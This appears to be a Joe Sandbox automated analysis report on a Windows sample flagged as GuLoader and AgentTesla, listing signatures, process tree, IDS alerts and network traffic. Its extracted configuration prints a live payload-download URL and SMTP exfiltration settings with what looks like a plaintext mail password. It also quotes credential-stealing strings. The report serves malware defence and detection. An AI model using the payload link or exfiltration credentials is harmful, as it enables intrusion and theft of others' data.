Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xcVh7ZmH4Y.exe

Overview

General Information

Sample Name:xcVh7ZmH4Y.exe
Analysis ID:623886
MD5:d17d180329065df1bf54501a2c8e138b
SHA1:255c70621a90d6070d2585ef47eaff05c143c54a
SHA256:6a3b4d2025462d750011db9881bd74700cf7e2e7708398a18dfec422555ba438
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Enables debug privileges
Contains functionality to detect virtual machines (SMSW)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • xcVh7ZmH4Y.exe (PID: 2648 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: D17D180329065DF1BF54501A2C8E138B)
    • CasPol.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 2016 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "administracion@comansi.comJUGuete$2021mail.comansi.comfedericornanetti1990@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
          • 0x31250:$s10: logins
          • 0x485b4:$s10: logins
          • 0x4f838:$s11: credential
          • 0x1e4a:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
          • 0x2993:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
          • 0x1f6b:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.11.2077.246.191.210497715872839723 05/10/22-22:12:51.209096
          SID:2839723
          Source Port:49771
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2077.246.191.210497715872840032 05/10/22-22:12:51.209113
          SID:2840032
          Source Port:49771
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2077.246.191.210497695872839723 05/10/22-22:12:47.103829
          SID:2839723
          Source Port:49769
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2077.246.191.210497695872840032 05/10/22-22:12:47.103924
          SID:2840032
          Source Port:49769
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2077.246.191.210497695872030171 05/10/22-22:12:47.103829
          SID:2030171
          Source Port:49769
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2077.246.191.210497715872030171 05/10/22-22:12:51.209096
          SID:2030171
          Source Port:49771
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA"}
          Source: conhost.exe.428.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "administracion@comansi.comJUGuete$2021mail.comansi.comfedericornanetti1990@gmail.com"}
          Multi AV Scanner detection for submitted file
          Source: xcVh7ZmH4Y.exeVirustotal: Detection: 38%Perma Link
          Source: xcVh7ZmH4Y.exeMetadefender: Detection: 22%Perma Link
          Source: xcVh7ZmH4Y.exeReversingLabs: Detection: 39%
          Antivirus / Scanner detection for submitted sample
          Source: xcVh7ZmH4Y.exeAvira: detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01512E68 CryptUnprotectData,4_2_01512E68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_015134F9 CryptUnprotectData,4_2_015134F9
          Source: xcVh7ZmH4Y.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49756 version: TLS 1.2
          Source: xcVh7ZmH4Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49769 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49769 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.11.20:49769 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49771 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49771 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.11.20:49771 -> 77.246.191.210:587
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
          Source: Joe Sandbox ViewASN Name: BITNAPbitNAPDatacenter01BarcelonaES BITNAPbitNAPDatacenter01BarcelonaES
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-70-docs.googleusercontent.comConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.11.20:49769 -> 77.246.191.210:587
          Source: global trafficTCP traffic: 192.168.11.20:49769 -> 77.246.191.210:587
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000004.00000002.30952228522.000000001D9B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
          Source: CasPol.exe, 00000004.00000003.27210315170.0000000020AF1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30953010911.000000001DA23000.00000004.00000800.00020000.00000000.sdmp, Cookies.4.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
          Source: Cookies.4.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://SckyfZ.com
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.F
          Source: CasPol.exe, 00000004.00000002.30927463475.0000000001369000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: CasPol.exe, 00000004.00000002.30927463475.0000000001369000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: CasPol.exe, 00000004.00000002.30953405175.000000001DA52000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952819183.000000001DA13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.comansi.com
          Source: xcVh7ZmH4Y.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
          Source: AsOpenFile.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: CasPol.exe, 00000004.00000002.30952228522.000000001D9B3000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952931628.000000001DA1D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.27106953909.000000001C631000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952729098.000000001DA0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30953010911.000000001DA23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://SqvSXVgUZh6rJgTP37.com
          Source: CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/
          Source: CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/=(
          Source: CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/G
          Source: CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/R
          Source: CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927389187.000000000135C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17
          Source: CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
          Source: CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/w
          Source: AsOpenFile.exe.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-70-docs.googleusercontent.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49756 version: TLS 1.2
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: xcVh7ZmH4Y.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040755C1_2_0040755C
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00406D851_2_00406D85
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_71031BFF1_2_71031BFF
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F553551_2_02F55355
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F496C91_2_02F496C9
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4AEAA1_2_02F4AEAA
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4DA821_2_02F4DA82
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E64A1_2_02F4E64A
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F496211_2_02F49621
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4AFF51_2_02F4AFF5
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4AFED1_2_02F4AFED
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4A7E91_2_02F4A7E9
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F493D11_2_02F493D1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4A7B11_2_02F4A7B1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F497861_2_02F49786
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F563531_2_02F56353
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4AF5D1_2_02F4AF5D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4DB4C1_2_02F4DB4C
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F498ED1_2_02F498ED
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4DCDB1_2_02F4DCDB
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D8CD1_2_02F4D8CD
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4B0BD1_2_02F4B0BD
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D8BB1_2_02F4D8BB
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F494A71_2_02F494A7
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F558301_2_02F55830
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F498311_2_02F49831
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4B0221_2_02F4B022
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4DC151_2_02F4DC15
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D8111_2_02F4D811
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F560191_2_02F56019
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E1F31_2_02F4E1F3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4ADFF1_2_02F4ADFF
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D9CD1_2_02F4D9CD
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D9BC1_2_02F4D9BC
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E5A71_2_02F4E5A7
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4ADA11_2_02F4ADA1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D59D1_2_02F4D59D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4B1811_2_02F4B181
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4997A1_2_02F4997A
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D5601_2_02F4D560
